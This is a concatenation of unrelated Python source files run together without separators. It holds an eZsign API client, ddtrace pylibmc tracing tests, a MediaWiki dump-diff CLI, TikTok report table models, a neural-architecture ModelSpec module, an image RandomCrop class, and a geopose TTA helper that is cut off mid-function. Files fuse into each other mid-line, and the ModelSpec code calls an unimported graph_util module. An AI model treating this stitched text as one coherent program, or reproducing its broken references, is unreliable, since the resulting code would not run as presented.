ezsignfolder_get_forms_data_v1( self, pki_ezsignfolder_id, **kwargs ): """Retrieve an existing Ezsignfolder's forms data # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.ezsignfolder_get_forms_data_v1(pki_ezsignfolder_id, async_req=True) >>> result = thread.get() Args: pki_ezsignfolder_id (int): Keyword Args: _return_http_data_only (bool): response data without head status code and headers. Default is True. _preload_content (bool): if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. _request_timeout (int/float/tuple): timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. Default is None. _check_input_type (bool): specifies if type checking should be done one the data sent to the server. Default is True. _check_return_type (bool): specifies if type checking should be done one the data received from the server. Default is True. _content_type (str/None): force body content-type. Default is None and content-type will be predicted by allowed content-types and body. _host_index (int/None): specifies the index of the server that we want to use. Default is read from the configuration. async_req (bool): execute request asynchronously Returns: EzsignfolderGetFormsDataV1Response If the method is called asynchronously, returns the request thread. """ kwargs['async_req'] = kwargs.get( 'async_req', False ) kwargs['_return_http_data_only'] = kwargs.get( '_return_http_data_only', True ) kwargs['_preload_content'] = kwargs.get( '_preload_content', True ) kwargs['_request_timeout'] = kwargs.get( '_request_timeout', None ) kwargs['_check_input_type'] = kwargs.get( '_check_input_type', True ) kwargs['_check_return_type'] = kwargs.get( '_check_return_type', True ) kwargs['_content_type'] = kwargs.get( '_content_type') kwargs['_host_index'] = kwargs.get('_host_index') kwargs['pki_ezsignfolder_id'] = \ pki_ezsignfolder_id return self.ezsignfolder_get_forms_data_v1_endpoint.call_with_http_info(**kwargs) def ezsignfolder_get_list_v1( self, **kwargs ): """Retrieve Ezsignfolder list # noqa: E501 Enum values that can be filtered in query parameter *sFilter*: | Variable | Valid values | |---|---| | eEzsignfolderStep | Unsent
Sent
PartiallySigned
Expired
Completed
Archived | | eEzsignfoldertypePrivacylevel | User
Usergroup | # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.ezsignfolder_get_list_v1(async_req=True) >>> result = thread.get() Keyword Args: e_order_by (str): Specify how you want the results to be sorted. [optional] i_row_max (int): [optional] i_row_offset (int): [optional] accept_language (HeaderAcceptLanguage): [optional] s_filter (str): [optional] _return_http_data_only (bool): response data without head status code and headers. Default is True. _preload_content (bool): if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. _request_timeout (int/float/tuple): timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. Default is None. _check_input_type (bool): specifies if type checking should be done one the data sent to the server. Default is True. _check_return_type (bool): specifies if type checking should be done one the data received from the server. Default is True. _content_type (str/None): force body content-type. Default is None and content-type will be predicted by allowed content-types and body. _host_index (int/None): specifies the index of the server that we want to use. Default is read from the configuration. async_req (bool): execute request asynchronously Returns: EzsignfolderGetListV1Response If the method is called asynchronously, returns the request thread. """ kwargs['async_req'] = kwargs.get( 'async_req', False ) kwargs['_return_http_data_only'] = kwargs.get( '_return_http_data_only', True ) kwargs['_preload_content'] = kwargs.get( '_preload_content', True ) kwargs['_request_timeout'] = kwargs.get( '_request_timeout', None ) kwargs['_check_input_type'] = kwargs.get( '_check_input_type', True ) kwargs['_check_return_type'] = kwargs.get( '_check_return_type', True ) kwargs['_content_type'] = kwargs.get( '_content_type') kwargs['_host_index'] = kwargs.get('_host_index') return self.ezsignfolder_get_list_v1_endpoint.call_with_http_info(**kwargs) def ezsignfolder_get_object_v1( self, pki_ezsignfolder_id, **kwargs ): """Retrieve an existing Ezsignfolder # noqa: E501 ## ⚠️EARLY ADOPTERS WARNING ### This endpoint is not officially released. Its definition might still change and it might not be available in every environment and region. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.ezsignfolder_get_object_v1(pki_ezsignfolder_id, async_req=True) >>> result = thread.get() Args: pki_ezsignfolder_id (int): Keyword Args: _return_http_data_only (bool): response data without head status code and headers. Default is True. _preload_content (bool): if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. _request_timeout (int/float/tuple): timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. Default is None. _check_input_type (bool): specifies if type checking should be done one the data sent to the server. Default is True. _check_return_type (bool): specifies if type checking should be done one the data received from the server. Default is True. _content_type (str/None): force body content-type. Default is None and content-type will be predicted by allowed content-types and body. _host_index (int/None): specifies the index of the server that we want to use. Default is read from the configuration. async_req (bool): execute request asynchronously Returns: EzsignfolderGetObjectV1Response If the method is called asynchronously, returns the request thread. """ kwargs['async_req'] = kwargs.get( 'async_req', False ) kwargs['_return_http_data_only'] = kwargs.get( '_return_http_data_only', True ) kwargs['_preload_content'] = kwargs.get( '_preload_content', True ) kwargs['_request_timeout'] = kwargs.get( '_request_timeout', None ) kwargs['_check_input_type'] = kwargs.get( '_check_input_type', True ) kwargs['_check_return_type'] = kwargs.get( '_check_return_type', True ) kwargs['_content_type'] = kwargs.get( '_content_type') kwargs['_host_index'] = kwargs.get('_host_index') kwargs['pki_ezsignfolder_id'] = \ pki_ezsignfolder_id return self.ezsignfolder_get_object_v1_endpoint.call_with_http_info(**kwargs) def ezsignfolder_send_v1( self, pki_ezsignfolder_id, ezsignfolder_send_v1_request, **kwargs ): """Send the Ezsignfolder to the signatories for signature # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.ezsignfolder_send_v1(pki_ezsignfolder_id, ezsignfolder_send_v1_request, async_req=True) >>> result = thread.get() Args: pki_ezsignfolder_id (int): ezsignfolder_send_v1_request (EzsignfolderSendV1Request): Keyword Args: _return_http_data_only (bool): response data without head status code and headers. Default is True. _preload_content (bool): if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. _request_timeout (int/float/tuple): timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. Default is None. _check_input_type (bool): specifies if type checking should be done one the data sent to the server. Default is True. _check_return_type (bool): specifies if type checking should be done one the data received from the server. Default is True. _content_type (str/None): force body content-type. Default is None and content-type will be predicted by allowed content-types and body. _host_index (int/None): specifies the index of the server that we want to use. Default is read from the configuration. async_req (bool): execute request asynchronously Returns: EzsignfolderSendV1Response If the method is called asynchronously, returns the request thread. """ kwargs['async_req'] = kwargs.get( 'async_req', False ) kwargs['_return_http_data_only'] = kwargs.get( '_return_http_data_only', True ) kwargs['_preload_content'] = kwargs.get( '_preload_content', True ) kwargs['_request_timeout'] = kwargs.get( '_request_timeout', None ) kwargs['_check_input_type'] = kwargs.get( '_check_input_type', True ) kwargs['_check_return_type'] = kwargs.get( '_check_return_type', True ) kwargs['_content_type'] = kwargs.get( '_content_type') kwargs['_host_index'] = kwargs.get('_host_index') kwargs['pki_ezsignfolder_id'] = \ pki_ezsignfolder_id kwargs['ezsignfolder_send_v1_request'] = \ ezsignfolder_send_v1_request return self.ezsignfolder_send_v1_endpoint.call_with_http_info(**kwargs) def ezsignfolder_unsend_v1( self, pki_ezsignfolder_id, body, **kwargs ): """Unsend the Ezsignfolder # noqa: E501 Once an Ezsignfolder has been sent to signatories, it cannot be modified. Using this endpoint, you can unsend the Ezsignfolder and make it modifiable again. Signatories will receive an email informing them the signature process was aborted and they might receive a new invitation to sign. ⚠️ Warning: Any signature previously made by signatories on \"Non-completed\" Ezsigndocuments will be lost. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.ezsignfolder_unsend_v1(pki_ezsignfolder_id, body, async_req=True) >>> result = thread.get() Args: pki_ezsignfolder_id (int): body (str): Keyword Args: _return_http_data_only (bool): response data without head status code and headers. Default is True. _preload_content (bool): if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. _request_timeout (int/float/tuple): timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. Default is None. _check_input_type (bool): specifies if type checking should be done one the data sent to the server. Default is True. _check_return_type (bool): specifies if type checking should be done one the data received from the server. Default is True. _content_type (str/None): force body content-type. Default is None and content-type will be predicted by allowed content-types and body. _host_index (int/None): specifies the index of the server that we want to use. Default is read from the configuration. async_req (bool): execute request asynchronously Returns: EzsignfolderUnsendV1Response If the method is called asynchronously, returns the request thread. """ kwargs['async_req'] = kwargs.get( 'async_req', False ) kwargs['_return_http_data_only'] = kwargs.get( '_return_http_data_only', True ) kwargs['_preload_content'] = kwargs.get( '_preload_content', True ) kwargs['_request_timeout'] = kwargs.get( '_request_timeout', None ) kwargs['_check_input_type'] = kwargs.get( '_check_input_type', True ) kwargs['_check_return_type'] = kwargs.get( '_check_return_type', True ) kwargs['_content_type'] = kwargs.get( '_content_type') kwargs['_host_index'] = kwargs.get('_host_index') kwargs['pki_ezsignfolder_id'] = \ pki_ezsignfolder_id kwargs['body'] = \ body return self.ezsignfolder_unsend_v1_endpoint.call_with_http_info(**kwargs) # stdlib import time from unittest.case import SkipTest # 3p import pylibmc # project from ddtrace import Pin from ddtrace.constants import ANALYTICS_SAMPLE_RATE_KEY from ddtrace.contrib.pylibmc import TracedClient from ddtrace.contrib.pylibmc.patch import patch, unpatch from ddtrace.ext import memcached # testing from ...opentracer.utils import init_tracer from ...contrib.config import MEMCACHED_CONFIG as cfg from ...base import BaseTracerTestCase class PylibmcCore(object): """Core of the test suite for pylibmc Shared tests between the patch and TracedClient interface. Will be merge back to a single class once the TracedClient is deprecated. """ TEST_SERVICE = memcached.SERVICE def get_client(self): # Implement me pass def test_upgrade(self): raise SkipTest('upgrade memcached') # add tests for touch, cas, gets etc def test_append_prepend(self): client, tracer = self.get_client() # test start = time.time() client.set('a', 'crow') client.prepend('a', 'holy ') client.append('a', '!') # FIXME[matt] there is a bug in pylibmc & python 3 (perhaps with just # some versions of the libmemcache?) where append/prepend are replaced # with get. our traced versions do the right thing, so skipping this # test. try: assert client.get('a') == 'holy crow!' except AssertionError: pass end = time.time() # verify spans spans = tracer.writer.pop() for s in spans: self._verify_cache_span(s, start, end) expected_resources = sorted(['append', 'prepend', 'get', 'set']) resources = sorted(s.resource for s in spans) assert expected_resources == resources def test_incr_decr(self): client, tracer = self.get_client() # test start = time.time() client.set('a', 1) client.incr('a', 2) client.decr('a', 1) v = client.get('a') assert v == 2 end = time.time() # verify spans spans = tracer.writer.pop() for s in spans: self._verify_cache_span(s, start, end) expected_resources = sorted(['get', 'set', 'incr', 'decr']) resources = sorted(s.resource for s in spans) assert expected_resources == resources def test_incr_decr_ot(self): """OpenTracing version of test_incr_decr.""" client, tracer = self.get_client() ot_tracer = init_tracer('memcached', tracer) start = time.time() with ot_tracer.start_active_span('mc_ops'): client.set('a', 1) client.incr('a', 2) client.decr('a', 1) v = client.get('a') assert v == 2 end = time.time() # verify spans spans = tracer.writer.pop() ot_span = spans[0] assert ot_span.name == 'mc_ops' for s in spans[1:]: assert s.parent_id == ot_span.span_id self._verify_cache_span(s, start, end) expected_resources = sorted(['get', 'set', 'incr', 'decr']) resources = sorted(s.resource for s in spans[1:]) assert expected_resources == resources def test_clone(self): # ensure cloned connections are traced as well. client, tracer = self.get_client() cloned = client.clone() start = time.time() cloned.get('a') end = time.time() spans = tracer.writer.pop() for s in spans: self._verify_cache_span(s, start, end) expected_resources = ['get'] resources = sorted(s.resource for s in spans) assert expected_resources == resources def test_get_set_multi(self): client, tracer = self.get_client() # test start = time.time() client.set_multi({'a': 1, 'b': 2}) out = client.get_multi(['a', 'c']) assert out == {'a': 1} client.delete_multi(['a', 'c']) end = time.time() # verify spans = tracer.writer.pop() for s in spans: self._verify_cache_span(s, start, end) expected_resources = sorted(['get_multi', 'set_multi', 'delete_multi']) resources = sorted(s.resource for s in spans) assert expected_resources == resources def test_get_set_multi_prefix(self): client, tracer = self.get_client() # test start = time.time() client.set_multi({'a': 1, 'b': 2}, key_prefix='foo') out = client.get_multi(['a', 'c'], key_prefix='foo') assert out == {'a': 1} client.delete_multi(['a', 'c'], key_prefix='foo') end = time.time() # verify spans = tracer.writer.pop() for s in spans: self._verify_cache_span(s, start, end) assert s.get_tag('memcached.query') == '%s foo' % s.resource expected_resources = sorted(['get_multi', 'set_multi', 'delete_multi']) resources = sorted(s.resource for s in spans) assert expected_resources == resources def test_get_set_delete(self): client, tracer = self.get_client() # test k = u'cafe' v = 'val-foo' start = time.time() client.delete(k) # just in case out = client.get(k) assert out is None, out client.set(k, v) out = client.get(k) assert out == v end = time.time() # verify spans = tracer.writer.pop() for s in spans: self._verify_cache_span(s, start, end) assert s.get_tag('memcached.query') == '%s %s' % (s.resource, k) expected_resources = sorted(['get', 'get', 'delete', 'set']) resources = sorted(s.resource for s in spans) assert expected_resources == resources def _verify_cache_span(self, s, start, end): assert s.start > start assert s.start + s.duration < end assert s.service == self.TEST_SERVICE assert s.span_type == 'cache' assert s.name == 'memcached.cmd' assert s.get_tag('out.host') == cfg['host'] assert s.get_metric('out.port') == cfg['port'] def test_analytics_default(self): client, tracer = self.get_client() client.set('a', 'crow') spans = self.get_spans() self.assertEqual(len(spans), 1) self.assertIsNone(spans[0].get_metric(ANALYTICS_SAMPLE_RATE_KEY)) def test_analytics_with_rate(self): with self.override_config( 'pylibmc', dict(analytics_enabled=True, analytics_sample_rate=0.5) ): client, tracer = self.get_client() client.set('a', 'crow') spans = self.get_spans() self.assertEqual(len(spans), 1) self.assertEqual(spans[0].get_metric(ANALYTICS_SAMPLE_RATE_KEY), 0.5) def test_analytics_without_rate(self): with self.override_config( 'pylibmc', dict(analytics_enabled=True) ): client, tracer = self.get_client() client.set('a', 'crow') spans = self.get_spans() self.assertEqual(len(spans), 1) self.assertEqual(spans[0].get_metric(ANALYTICS_SAMPLE_RATE_KEY), 1.0) def test_disabled(self): """ Ensure client works when the tracer is disabled """ client, tracer = self.get_client() try: tracer.enabled = False client.set('a', 'crow') spans = self.get_spans() assert len(spans) == 0 finally: tracer.enabled = True class TestPylibmcLegacy(BaseTracerTestCase, PylibmcCore): """Test suite for the tracing of pylibmc with the legacy TracedClient interface""" TEST_SERVICE = 'mc-legacy' def get_client(self): url = '%s:%s' % (cfg['host'], cfg['port']) raw_client = pylibmc.Client([url]) raw_client.flush_all() client = TracedClient(raw_client, tracer=self.tracer, service=self.TEST_SERVICE) return client, self.tracer class TestPylibmcPatchDefault(BaseTracerTestCase, PylibmcCore): """Test suite for the tracing of pylibmc with the default lib patching""" def setUp(self): super(TestPylibmcPatchDefault, self).setUp() patch() def tearDown(self): unpatch() super(TestPylibmcPatchDefault, self).tearDown() def get_client(self): url = '%s:%s' % (cfg['host'], cfg['port']) client = pylibmc.Client([url]) client.flush_all() Pin.get_from(client).clone(tracer=self.tracer).onto(client) return client, self.tracer class TestPylibmcPatch(TestPylibmcPatchDefault): """Test suite for the tracing of pylibmc with a configured lib patching""" TEST_SERVICE = 'mc-custom-patch' def get_client(self): client, tracer = TestPylibmcPatchDefault.get_client(self) Pin.get_from(client).clone(service=self.TEST_SERVICE).onto(client) return client, tracer def test_patch_unpatch(self): url = '%s:%s' % (cfg['host'], cfg['port']) # Test patch idempotence patch() patch() client = pylibmc.Client([url]) Pin.get_from(client).clone( service=self.TEST_SERVICE, tracer=self.tracer).onto(client) client.set('a', 1) spans = self.tracer.writer.pop() assert spans, spans assert len(spans) == 1 # Test unpatch unpatch() client = pylibmc.Client([url]) client.set('a', 1) spans = self.tracer.writer.pop() assert not spans, spans # Test patch again patch() client = pylibmc.Client([url]) Pin(service=self.TEST_SERVICE, tracer=self.tracer).onto(client) client.set('a', 1) spans = self.tracer.writer.pop() assert spans, spans assert len(spans) == 1 1-10 r""" ``$ mwdiffs dump2diffs -h`` :: Computes diffs from an XML dump. Usage: dump2diffs (-h|--help) dump2diffs [...] --config= [--namespaces=] [--timeout=] [--keep-text] [--threads=] [--output=] [--compress=] [--verbose] [--debug] Options: -h|--help Print this documentation The path to a MediaWiki XML Dump file [default: ] --config= The path to a deltas DiffEngine configuration --namespaces= A comma separated list of namespace IDs to be considered [default: ] --timeout= The maximum number of seconds that a diff will be able to run before being stopped [default: 10] --keep-text If set, the 'text' field will not be dropped after diffs are computed. --threads= If a collection of files are provided, how many processor threads? [default: ] --output= Write output to a directory with one output file per input path. [default: ] --compress= If set, output written to the output-dir will be compressed in this format. [default: bz2] --verbose Print progress information to stderr. --debug Prints debug logs to stder. """ import logging import mwcli import mwxml import mwxml.utilities from .revdocs2diffs import drop_text, process_args, revdocs2diffs logger = logging.getLogger(__name__) def _dump2diffs(*args, keep_text=False, **kwargs): keep_text = bool(keep_text) docs = dump2diffs(*args, **kwargs) if not keep_text: docs = drop_text(docs) yield from docs def dump2diffs(dump, *args, **kwargs): """ Generates a sequence of revision JSON documents containing a 'diff' field that represents the change to the text between revisions. :Parameters: dump : :class:`mwxml.Dump` An XML dump to process diff_engine : :class:`deltas.DiffEngine` A configured diff engine for comparing revisions namespaces : `set` ( `int` ) A set of namespace IDs that will be processed. If left unspecified, all namespaces will be processed. timeout : `float` The maximum time in seconds that a difference detection operation should be allowed to consume. This is used to handle extremely computationally complex diffs that occur from time to time. When a diff takes longer than this many seconds, a trivial diff will be reported (remove all the tokens and add them back) and the 'timedout' field will be set to True verbose : `bool` Print dots and stuff to stderr """ rev_docs = mwxml.utilities.dump2revdocs(dump) return revdocs2diffs(rev_docs, *args, **kwargs) streamer = mwcli.Streamer( __doc__, __name__, _dump2diffs, process_args, file_reader=mwxml.Dump.from_file ) main = streamer.main models/model_tiktok.py import sqlalchemy as alchemy from . import base from typing import Optional class TikTokReportTableModel(base.ReportTableModel): @property def date_format_string(self) -> Optional[str]: return '%Y-%m-%d %H:%M:%S' def define_table(self): alchemy.Table( self.table_name, self.declarative_base.metadata, alchemy.Column(self.date_column_name, alchemy.Date), alchemy.Column(self.crystallized_column_name, alchemy.Boolean), alchemy.Column('advertiser_id', alchemy.Text), schema=self.schema_name ) class TikTokCampaignReportTableModel(TikTokReportTableModel): @property def date_column_name(self) -> str: return 'campaign_stat_datetime' @property def table_name(self) -> str: return base.ReportTaskType.fetch_tiktok_campaigns.value class TikTokAdGroupReportTableModel(TikTokReportTableModel): @property def date_column_name(self) -> str: return 'adgroup_stat_datetime' @property def table_name(self) -> str: return base.ReportTaskType.fetch_tiktok_adgroups.value class TikTokAdReportTableModel(TikTokReportTableModel): @property def date_column_name(self) -> str: return 'ad_stat_datetime' @property def table_name(self) -> str: return base.ReportTaskType.fetch_tiktok_ads.value # class TikTokAdGroupReportTableModel(TikTokReportTableModel): # @property # def table_name(self) -> str: # return base.ReportTaskType.fetch_snapchat_adsquads.value # class TikTokAdReportTableModel(TikTokReportTableModel): # @property # def table_name(self) -> str: # return base.ReportTaskType.fetch_snapchat_ads.value# Copyright 2021 Samsung Electronics Co., Ltd. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================= """Model specification for module connectivity individuals. This module handles pruning the unused parts of the computation graph but should avoid creating any TensorFlow models (this is done inside model_builder.py). """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import copy import hashlib import itertools import numpy as np # Graphviz is optional and only required for visualization. try: import graphviz # pylint: disable=g-import-not-at-top except ImportError: pass def _ToModelSpec(mat, ops): return ModelSpec(mat, ops) def gen_is_edge_fn(bits): """Generate a boolean function for the edge connectivity. Given a bitstring FEDCBA and a 4x4 matrix, the generated matrix is [[0, A, B, D], [0, 0, C, E], [0, 0, 0, F], [0, 0, 0, 0]] Note that this function is agnostic to the actual matrix dimension due to order in which elements are filled out (column-major, starting from least significant bit). For example, the same FEDCBA bitstring (0-padded) on a 5x5 matrix is [[0, A, B, D, 0], [0, 0, C, E, 0], [0, 0, 0, F, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0]] Args: bits: integer which will be interpreted as a bit mask. Returns: vectorized function that returns True when an edge is present. """ def is_edge(x, y): """Is there an edge from x to y (0-indexed)?""" if x >= y: return 0 # Map x, y to index into bit string index = x + (y * (y - 1) // 2) return (bits >> index) % 2 == 1 return np.vectorize(is_edge) def is_full_dag(matrix): """Full DAG == all vertices on a path from vert 0 to (V-1). i.e. no disconnected or "hanging" vertices. It is sufficient to check for: 1) no rows of 0 except for row V-1 (only output vertex has no out-edges) 2) no cols of 0 except for col 0 (only input vertex has no in-edges) Args: matrix: V x V upper-triangular adjacency matrix Returns: True if the there are no dangling vertices. """ shape = np.shape(matrix) rows = matrix[:shape[0]-1, :] == 0 rows = np.all(rows, axis=1) # Any row with all 0 will be True rows_bad = np.any(rows) cols = matrix[:, 1:] == 0 cols = np.all(cols, axis=0) # Any col with all 0 will be True cols_bad = np.any(cols) return (not rows_bad) and (not cols_bad) def num_edges(matrix): """Computes number of edges in adjacency matrix.""" return np.sum(matrix) def hash_module(matrix, labeling): """Computes a graph-invariance MD5 hash of the matrix and label pair. Args: matrix: np.ndarray square upper-triangular adjacency matrix. labeling: list of int labels of length equal to both dimensions of matrix. Returns: MD5 hash of the matrix and labeling. """ vertices = np.shape(matrix)[0] in_edges = np.sum(matrix, axis=0).tolist() out_edges = np.sum(matrix, axis=1).tolist() assert len(in_edges) == len(out_edges) == len(labeling) hashes = list(zip(out_edges, in_edges, labeling)) hashes = [hashlib.md5(str(h).encode('utf-8')).hexdigest() for h in hashes] # Computing this up to the diameter is probably sufficient but since the # operation is fast, it is okay to repeat more times. for _ in range(vertices): new_hashes = [] for v in range(vertices): in_neighbors = [hashes[w] for w in range(vertices) if matrix[w, v]] out_neighbors = [hashes[w] for w in range(vertices) if matrix[v, w]] new_hashes.append(hashlib.md5( (''.join(sorted(in_neighbors)) + '|' + ''.join(sorted(out_neighbors)) + '|' + hashes[v]).encode('utf-8')).hexdigest()) hashes = new_hashes fingerprint = hashlib.md5(str(sorted(hashes)).encode('utf-8')).hexdigest() return fingerprint def permute_graph(graph, label, permutation): """Permutes the graph and labels based on permutation. Args: graph: np.ndarray adjacency matrix. label: list of labels of same length as graph dimensions. permutation: a permutation list of ints of same length as graph dimensions. Returns: np.ndarray where vertex permutation[v] is vertex v from the original graph """ # vertex permutation[v] in new graph is vertex v in the old graph forward_perm = zip(permutation, list(range(len(permutation)))) inverse_perm = [x[1] for x in sorted(forward_perm)] edge_fn = lambda x, y: graph[inverse_perm[x], inverse_perm[y]] == 1 new_matrix = np.fromfunction(np.vectorize(edge_fn), (len(label), len(label)), dtype=np.int8) new_label = [label[inverse_perm[i]] for i in range(len(label))] return new_matrix, new_label def is_isomorphic(graph1, graph2): """Exhaustively checks if 2 graphs are isomorphic.""" matrix1, label1 = np.array(graph1[0]), graph1[1] matrix2, label2 = np.array(graph2[0]), graph2[1] assert np.shape(matrix1) == np.shape(matrix2) assert len(label1) == len(label2) vertices = np.shape(matrix1)[0] # Note: input and output in our constrained graphs always map to themselves # but this script does not enforce that. for perm in itertools.permutations(range(0, vertices)): pmatrix1, plabel1 = permute_graph(matrix1, label1, perm) if np.array_equal(pmatrix1, matrix2) and plabel1 == label2: return True return False class ModelSpec(object): """Model specification given adjacency matrix and labeling.""" def __init__(self, matrix, ops, data_format='channels_last'): """Initialize the module spec. Args: matrix: ndarray or nested list with shape [V, V] for the adjacency matrix. ops: V-length list of labels for the base ops used. The first and last elements are ignored because they are the input and output vertices which have no operations. The elements are retained to keep consistent indexing. data_format: channels_last or channels_first. Raises: ValueError: invalid matrix or ops """ if not isinstance(matrix, np.ndarray): matrix = np.array(matrix) shape = np.shape(matrix) if len(shape) != 2 or shape[0] != shape[1]: raise ValueError('matrix must be square') if shape[0] != len(ops): raise ValueError('length of ops must match matrix dimensions') if not is_upper_triangular(matrix): raise ValueError('matrix must be upper triangular') # Both the original and pruned matrices are deep copies of the matrix and # ops so any changes to those after initialization are not recognized by the # spec. self.original_matrix = copy.deepcopy(matrix) self.original_ops = copy.deepcopy(ops) self.matrix = copy.deepcopy(matrix) self.ops = copy.deepcopy(ops) self.valid_spec = True self._prune() self.data_format = data_format def _prune(self): """Prune the extraneous parts of the graph. General procedure: 1) Remove parts of graph not connected to input. 2) Remove parts of graph not connected to output. 3) Reorder the vertices so that they are consecutive after steps 1 and 2. These 3 steps can be combined by deleting the rows and columns of the vertices that are not reachable from both the input and output (in reverse). """ num_vertices = np.shape(self.original_matrix)[0] # DFS forward from input visited_from_input = set([0]) frontier = [0] while frontier: top = frontier.pop() for v in range(top + 1, num_vertices): if self.original_matrix[top, v] and v not in visited_from_input: visited_from_input.add(v) frontier.append(v) # DFS backward from output visited_from_output = set([num_vertices - 1]) frontier = [num_vertices - 1] while frontier: top = frontier.pop() for v in range(0, top): if self.original_matrix[v, top] and v not in visited_from_output: visited_from_output.add(v) frontier.append(v) # Any vertex that isn't connected to both input and output is extraneous to # the computation graph. extraneous = set(range(num_vertices)).difference( visited_from_input.intersection(visited_from_output)) # If the non-extraneous graph is less than 2 vertices, the input is not # connected to the output and the spec is invalid. if len(extraneous) > num_vertices - 2: self.matrix = None self.ops = None self.valid_spec = False return self.matrix = np.delete(self.matrix, list(extraneous), axis=0) self.matrix = np.delete(self.matrix, list(extraneous), axis=1) for index in sorted(extraneous, reverse=True): del self.ops[index] def hash_spec(self, canonical_ops): """Computes the isomorphism-invariant graph hash of this spec. Args: canonical_ops: list of operations in the canonical ordering which they were assigned (i.e. the order provided in the config['available_ops']). Returns: MD5 hash of this spec which can be used to query the dataset. """ # Invert the operations back to integer label indices used in graph gen. labeling = [-1] + [canonical_ops.index(op) for op in self.ops[1:-1]] + [-2] return graph_util.hash_module(self.matrix, labeling) def visualize(self): """Creates a dot graph. Can be visualized in colab directly.""" num_vertices = np.shape(self.matrix)[0] g = graphviz.Digraph() g.node(str(0), 'input') for v in range(1, num_vertices - 1): g.node(str(v), self.ops[v]) g.node(str(num_vertices - 1), 'output') for src in range(num_vertices - 1): for dst in range(src + 1, num_vertices): if self.matrix[src, dst]: g.edge(str(src), str(dst)) return g def is_upper_triangular(matrix): """True if matrix is 0 on diagonal and below.""" for src in range(np.shape(matrix)[0]): for dst in range(0, src + 1): if matrix[src, dst] != 0: return False return True""" Slightly modified version of: https://github.com/pytorch/vision/blob/master/torchvision/transforms/transforms.py """ import numbers import random import vel.api.data as data class RandomCrop(data.Augmentation): """Crop the given PIL Image at a random location. Args: size (sequence or int): Desired output size of the crop. If size is an int instead of sequence like (h, w), a square crop (size, size) is made. padding (int or sequence, optional): Optional padding on each border of the image. Default is 0, i.e no padding. If a sequence of length 4 is provided, it is used to pad left, top, right, bottom borders respectively. pad_if_needed (boolean): It will pad the image if smaller than the desired size to avoid raising an exception. """ def __init__(self, size, padding=0, padding_mode='constant', pad_if_needed=False, mode='x', tags=None): super().__init__(mode, tags) if isinstance(size, numbers.Number): self.size = (int(size), int(size)) else: self.size = size self.padding = padding self.padding_mode = padding_mode self.padding_mode_cv = data.mode_to_cv2(self.padding_mode) self.pad_if_needed = pad_if_needed @staticmethod def get_params(img, output_size): """Get parameters for ``crop`` for a random crop. Args: img (PIL Image): Image to be cropped. output_size (tuple): Expected output size of the crop. Returns: tuple: params (i, j, h, w) to be passed to ``crop`` for random crop. """ w, h, *_ = img.shape th, tw = output_size if w == tw and h == th: return 0, 0, h, w i = random.randint(0, h - th) j = random.randint(0, w - tw) return i, j, th, tw def __call__(self, img): """ Args: img (PIL Image): Image to be cropped. Returns: PIL Image: Cropped image. """ if self.padding > 0: img = data.pad(img, self.padding, mode=self.padding_mode_cv) # pad the width if needed if self.pad_if_needed and img.size[0] < self.size[1]: img = data.pad(img, (int((1 + self.size[1] - img.size[0]) / 2), 0), mode=self.padding_mode_cv) # pad the height if needed if self.pad_if_needed and img.size[1] < self.size[0]: img = data.pad(img, (0, int((1 + self.size[0] - img.size[1]) / 2)), mode=self.padding_mode_cv) i, j, h, w = self.get_params(img, self.size) return data.crop(img, j, i, w, h) def __repr__(self): return self.__class__.__name__ + '(size={0}, padding={1})'.format(self.size, self.padding) def create(width, height, padding=0, padding_mode='constant', mode='x', tags=None): return RandomCrop(size=(width, height), padding=padding, padding_mode=padding_mode, mode=mode, tags=tags) from functools import partial import torch import torch.nn.functional as F from pytorch_toolbelt.datasets import INPUT_IMAGE_KEY from pytorch_toolbelt.inference.tta import ( _deaugment_averaging, fliplr_image_augment, fliplr_image_deaugment, fliplr_labels_deaugment, fliplr_labels_augment, ) from torch import Tensor from geopose.dataset import ( INPUT_GROUND_SAMPLE_DISTANCE, OUTPUT_VFLOW_SCALE, OUTPUT_VFLOW_DIRECTION, OUTPUT_AGL_MASK, ) from .geopose_tta import GeoposeTTAModel def geopose_model_fliplr_tta(model, agl_reduction="mean"): return GeoposeTTAModel( model, augment_fn={INPUT_IMAGE_KEY: fliplr_image_augment, INPUT_GROUND_SAMPLE_DISTANCE: fliplr_labels_augment}, deaugment_fn={ OUTPUT_VFLOW_SCALE: fliplr_labels_deaugment, OUTPUT_VFLOW_DIRECTION: fliplr_direction_deaugment, OUTPUT_AGL_MASK: partial(fliplr_image_deaugment, reduction=agl_reduction), }, ) def fliplr_direction_deaugment(direction: Tensor, reduction="mean") -> Tensor: """ Deaugment input tensor (output of the model) assuming the input was D4-augmented image (See d4_augment). Args: direction: Tensor of [B * 2, 2] shape reduction: If True performs averaging of 2 outputs, otherwise - summation. Returns: Tensor of [B, 2] shape if reduction is not None or "none", otherwise returns de-augmented tensor of [2, B, 2] shape """ if direction.size(0) % 2 != 0: raise RuntimeError("Batch size must be divisible by 2") 